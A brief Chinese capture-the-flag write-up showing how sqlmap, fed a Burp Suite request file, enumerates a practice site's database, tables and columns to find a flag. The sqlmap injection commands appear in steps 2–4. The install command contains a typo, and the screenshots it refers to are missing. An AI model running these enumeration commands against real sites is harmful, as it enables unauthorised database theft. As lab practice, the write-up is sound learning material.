一、sqlmap解题
在mac系统中sqlmap可以用brew install sqlmao安装,出现以下界面表示安装成功。
1、首先在输入框中输入数字1,Burp Suite抓包,然后右键Copy to file,我这边保存为chengji.txt
2、先破解数据库名称,得出数据库名称为 skctf_flag
sqlmap -r chengji.txt -p id --current-db
//-r 加载抓包获取的文件chengji.txt
//-p 指定参数
结果如下:
3、根据得到的数据库名,破解数据库表名,破解出有两个表fl4g、sc
sqlmap -r chengji.txt -p id -D skctf_flag --tables
//-D 指定数据库名称
//--tables 列出数据库表
4、一目了然flag在fl4g表中,接下来破解数据库表中的列
sqlmap -r chengji.txt -p id -D skctf_flag -T fl4g --columns
5、查看skctf_flag的值
ps:自己做第一遍的时候都是用手工写注入,用了好久才解出来。看了别人的writeup才知道可以用sqlmap,所以就记录下sqlmap的使用笔记。